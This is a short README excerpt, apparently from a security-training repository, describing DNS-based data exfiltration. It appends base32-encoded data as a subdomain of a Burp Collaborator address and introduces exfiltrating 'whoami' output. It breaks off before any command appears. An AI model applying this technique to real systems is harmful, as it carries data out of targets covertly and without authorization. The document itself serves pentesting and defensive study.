sans-blue-team/DNS-Exfiltrate/README.md

 Burp Collaborator allows appending hostnames to the provided address.
 For example: assume this is your collaborator address: `q3uv485lz802ad6a7xz6c2izvq1hp6.oastify.com`

 You may prepend a 'hostname' (maximum length of a DNS label is 63 bytes), assuming it uses characters safe in a DNS query (such as base32-encoded data, see below).
 This allows exfiltration (including blind exfiltration) of data via DNS.
+Works best with a private Burp Collaborator server (or any DNS server that logs queries).

 Exfiltrate the base32-encoded output from `whoami` via Burp Collaborator: